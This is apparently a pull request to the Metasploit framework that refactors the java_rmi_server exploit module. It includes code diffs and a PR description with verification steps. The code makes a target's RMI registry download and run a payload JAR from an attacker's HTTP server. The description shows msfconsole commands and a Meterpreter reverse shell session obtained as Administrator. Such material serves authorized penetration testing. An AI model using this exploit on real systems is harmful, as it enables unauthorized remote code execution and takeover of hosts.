### PR TITLE
Some cleanup on java_rmi_server

### DIFF
--- a/lib/msf/core/exploit/tcp_server.rb
+++ b/lib/msf/core/exploit/tcp_server.rb
@@ -160,6 +160,11 @@ module Exploit::Remote::TcpServer
           self.service.close
           self.service.stop
         end
+
+        if service.kind_of?(Rex::Proto::Http::Server)
+          service.stop
+        end
+
         self.service = nil
       rescue ::Exception
       end

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -38,10 +38,10 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => 'Oct 15 2011',
       'Platform'       => %w{ java linux osx solaris win },
-      'Privileged'     => true,
-      'Payload'       => { 'BadChars' => '', 'DisableNops' => true },
-      'Stance'        => Msf::Exploit::Stance::Aggressive,
-      'Targets'       =>
+      'Privileged'     => false,
+      'Payload'        => { 'BadChars' => '', 'DisableNops' => true },
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'Targets'        =>
         [
           [ 'Generic (Java Payload)',
             {
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           ]
         ],
-      'DefaultTarget' => 0
+      'DefaultTarget'  => 0
     ))
     register_options( [ Opt::RPORT(1099) ], self.class)
 

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -112,13 +112,11 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if buf =~ /RMI class loader disabled/
-      print_error("Not exploitable: the RMI class loader is disabled")
-      return
+      fail_with(Failure::NotVulnerable, "The RMI class loader is disabled")
     end
 
     if buf =~ /java.lang.ClassNotFoundException/
-      print_error("Not exploitable: the RMI class loader doesn't find the payload")
-      return
+      fail_with(Failure::Unknown, "The RMI class loader couldn't find the payload")
     end
 
     print_good("Target #{rhost}:#{rport} may be exploitable...")

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
     packet[idx, find_me.length] = len + new_url
 
     # write out minimal header and packet
-    print_status("Connected and sending request for #{new_url}")
+    print_status("#{peer} - Connected and sending request for #{new_url}")
     #sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
     sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet)
 
@@ -138,14 +138,14 @@ class Metasploit3 < Msf::Exploit::Remote
     disconnect
 
     if buf =~ /RMI class loader disabled/
-      fail_with(Failure::NotVulnerable, "The RMI class loader is disabled")
+      fail_with(Failure::NotVulnerable, "#{peer} - The RMI class loader is disabled")
     end
 
     if buf =~ /java.lang.ClassNotFoundException/
-      fail_with(Failure::Unknown, "The RMI class loader couldn't find the payload")
+      fail_with(Failure::Unknown, "#{peer} - The RMI class loader couldn't find the payload")
     end
 
-    print_good("Target #{rhost}:#{rport} may be exploitable...")
+    print_good("#{peer} - Target may be exploitable...")
   end
 
   def on_request_uri(cli, request)

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
       # When the server stops due primer failing, re-raise
       # RuntimeError so it won't wait the full wfs_delays
       raise ::RuntimeError, "Exploit aborted due to failure #{fail_reason} #{(fail_detail || "No reason given")}"
-    rescue Rex::ConnectionTimeout => e
+    rescue Rex::ConnectionTimeout, Rex::ConnectionRefused => e
       # When the primer fails due to an error connecting with
       # the rhost, re-raise RuntimeError so it won't wait the
       # full wfs_delays

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -116,6 +116,11 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
+    if buf =~ /java.lang.ClassNotFoundException/
+      print_error("Not exploitable: the RMI class loader doesn't find the payload")
+      return
+    end
+
     print_good("Target #{rhost}:#{rport} may be exploitable...")
 
     # Wait for the request to be handled

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -8,8 +8,8 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpServer
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
     super(update_info(info,
@@ -41,6 +41,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'Payload'        => { 'BadChars' => '', 'DisableNops' => true },
       'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 10
+        },
       'Targets'        =>
         [
           [ 'Generic (Java Payload)',
@@ -76,14 +80,26 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DefaultTarget'  => 0
     ))
-    register_options( [ Opt::RPORT(1099) ], self.class)
+    register_options([
+      Opt::RPORT(1099),
+      OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
+    ], self.class)
 
     register_autofilter_ports([ 1098, 1099 ])
     register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
   end
 
   def exploit
-    start_service()
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) { super }
+    rescue Timeout::Error
+      # When the server stops due to our timeout, fail and
+      # don't wait WfsDelay
+      fail_with(Failure::Unknown, "The HTTP Server didn't get a payload requests")
+    end
+  end
+
+  def primer
     connect
 
     jar = rand_text_alpha(rand(8)+1) + '.jar'
@@ -106,10 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote
     buf = ""
     1.upto(6) do
       res = sock.get_once(-1, 5) rescue nil
-      break if not res
+      break unless res
       break if session_created?
       buf << res
     end
+
+    disconnect
 
     if buf =~ /RMI class loader disabled/
       fail_with(Failure::NotVulnerable, "The RMI class loader is disabled")
@@ -120,14 +138,6 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_good("Target #{rhost}:#{rport} may be exploitable...")
-
-    # Wait for the request to be handled
-    1.upto(120) do
-      break if session_created?
-      select(nil, nil, nil, 0.25)
-      handler()
-    end
-
   end
 
   def on_request_uri(cli, request)
@@ -148,6 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
       })
 
       print_status("Replied to request for payload JAR")
+      stop_service
     end
   end
 

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -100,6 +100,11 @@ class Metasploit3 < Msf::Exploit::Remote
       # When the server stops due primer failing, re-raise
       # RuntimeError so it won't wait the full wfs_delays
       raise ::RuntimeError, "Exploit aborted due to failure #{fail_reason} #{(fail_detail || "No reason given")}"
+    rescue Rex::ConnectionTimeout => e
+      # When the primer fails due to an error connecting with
+      # the rhost, re-raise RuntimeError so it won't wait the
+      # full wfs_delays
+      raise ::RuntimeError, e.message
     end
   end
 

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -93,10 +93,18 @@ class Metasploit3 < Msf::Exploit::Remote
     begin
       Timeout.timeout(datastore['HTTPDELAY']) { super }
     rescue Timeout::Error
-      # When the server stops due to our timeout, fail and
-      # don't wait WfsDelay
-      fail_with(Failure::Unknown, "The HTTP Server didn't get a payload requests")
+      # When the server stops due to our timeout, re-raise
+      # RuntimeError so it won't wait the full wfs_delay
+      raise ::RuntimeError, "Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request"
+    rescue Msf::Exploit::Failed
+      # When the server stops due primer failing, re-raise
+      # RuntimeError so it won't wait the full wfs_delays
+      raise ::RuntimeError, "Exploit aborted due to failure #{fail_reason} #{(fail_detail || "No reason given")}"
     end
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
   end
 
   def primer


### PR DESCRIPTION
Summary:
- Use exploit/primer since the module is Aggressive, using `Msf::Exploit::Remote::Tcp` and `include Msf::Exploit::Remote::HttpServer`. So the exploit doesn't need to start the service, allowing the mixin to make it.
- Manage Exceptions in `exploit` to not wait `WfsDelay` when the exploit isn't successful. 
- Handle java.lang.ClassNotFoundException on the RMI answer when trying to load the msf payload, since it happens by default on modern versions of Java.
## Verification
- [x] Install a Windows machine for testing (I've used windows XP SP3) (indeed any system capable of running oracle java and you feel comfortable)
- [x] Install Java 7.0 SDK,  can be downloaded without registration from: http://www.oldapps.com/es/java.php?old_java=6146?download
- [x] From a cmd, go to `C:\Program Files\Java\jdk1.7.0\bin` and execute `start rmiregistry.exe`

```
C:\Program Files\Java\jdk1.7.0\bin>start rmiregistry.exe
```
- [x] Init msfconsole
- [x] Execute the module

```
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > set rhost 172.16.158.133
rhost => 172.16.158.133
msf exploit(java_rmi_server) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(java_rmi_server) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Using URL: http://172.16.158.1:8080/uS1TRv0w1bKYy
[*] Server started.
[*] 172.16.158.131:1099 - Connected and sending request for http://172.16.158.1:8080/uS1TRv0w1bKYy/VeYn.jar
[*] 172.16.158.131   java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 172.16.158.131
[+] 172.16.158.131:1099 - Target may be exploitable...
[*] Server stopped.

meterpreter > getuid
Server username: Administrator
emeterpreter > exit
```
- [x] Verify which you get a session and you don't need to wait after the session is popped
- [x] On the target, uninstall Java 7 SDK
- [x] Install Java 7 Update 72 SDK
- [x] Start rmiregistry as explained above
- [x] Run the module against the target:

```
msf exploit(java_rmi_server) > set rhost 172.16.158.133
rhost => 172.16.158.133
msf exploit(java_rmi_server) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Using URL: http://172.16.158.1:8080/NJVJXUEkhEB
[*] Server started.
[*] 172.16.158.133:1099 - Connected and sending request for http://172.16.158.1:8080/NJVJXUEkhEB/Wu.jar
[-] Exploit failed: RuntimeError Exploit aborted due to failure unknown 172.16.158.133:1099 - The RMI class loader couldn't find the payload
[*] Server stopped.
```
- [x] Verify which the module fails, you can read the fail message "The RMI class loader couldn't find the payload", and the server stops and the module ends without waiting.
